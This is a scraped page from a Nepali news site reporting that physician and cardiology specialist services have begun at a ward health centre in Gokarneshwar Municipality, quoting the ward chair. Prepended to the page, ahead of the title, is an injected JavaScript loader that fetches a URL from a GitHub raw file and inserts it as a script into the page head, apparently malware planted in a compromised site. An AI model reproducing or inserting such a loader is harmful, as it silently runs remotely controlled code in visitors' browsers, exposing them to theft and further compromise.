;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); वडाको स्वास्थ्य केन्द्रमा विशेषज्ञ सेवाले सेवाग्राही खुसि – वडा अध्यक्ष नन्दलाल श्रेष्ठ – जुनेली न्युज
बुधबार, बैशाख ४, २०८२
  • होमपेज
  • वडाको स्वास्थ्य केन्द्रमा विशेषज्ञ सेवाले सेवाग्राही खुसि – वडा अध्यक्ष नन्दलाल श्रेष्ठ
Breaking News

वडाको स्वास्थ्य केन्द्रमा विशेषज्ञ सेवाले सेवाग्राही खुसि – वडा अध्यक्ष नन्दलाल श्रेष्ठ

माघ २५, काठमाडौं । गोकर्णेश्वर नगरपालिका वडा नं. ८ मा रहेको बेसीगाउँ शहरी स्वास्थ्य केन्द्रमा विशेषज्ञ सेवा शुरु भए संगै सेवा लिन आउने सेवाग्राही खुसि भएका वडा अध्यक्ष नन्दलाल श्रेष्ठले जानकारी दिएका छन् |

वडा भवनमा रहेको बेसीगाउँ शहरी स्वास्थ्य केन्द्रमा माघ २१ गतेबाट फिजिसियन तथा मुटु रोग विशेषज्ञ सेवा शुरु भएको हो ।

केन्द्रमा वरिष्ठ मुटु रोग विशेषज्ञ तथा फिजिसियन डा. बिनोद कुमार दाहाल केन्द्रमा फिजिसियन तथा मुटु रोग विशेषज्ञ रहनु भएको छ ।

विशेषज्ञ सेवा सार्वजनिक विदा बाहेक दैनिक रुपमा सुचारु हुने वडा कार्यालयले जारी गरेको सूचनामा जनाइएको छ । विशेषज्ञ सेवा बिहान १०:३० देखि ११:३० सम्म हुनेछ ।

फेसबुक प्रतिक्रियाहरु